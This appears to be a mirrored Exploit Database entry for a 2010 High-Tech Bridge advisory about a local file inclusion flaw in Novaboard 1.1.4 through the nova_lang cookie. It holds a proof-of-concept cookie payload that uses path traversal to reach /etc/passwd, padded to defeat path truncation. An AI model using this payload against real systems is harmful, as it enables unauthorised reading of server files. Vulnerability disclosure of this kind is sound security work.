Novaboard 1.1.4 – Local File Inclusion

• Exploit Database
• 147 阅读

• 作者： High-Tech Bridge SA
  日期： 2010-10-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15324/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

  Vulnerability ID: HTB22657 Reference: http://www.htbridge.ch/advisory/lfi_in_novaboard.html Product: Novaboard Vendor: Novaboard( http://www.novaboard.net/ ) Vulnerable Version: 1.1.4 and probably prior versions Vendor Notification: 13 October 2010 Vulnerability Type: Local File Inclusion Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   Vulnerability Details: The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in nova_lang variable from cookie.   The following PoC is available:     Cookie: nova_lang=../../../../../../../../../../../../../../etc/passwd/././././.[>4095 * "/."]/././././.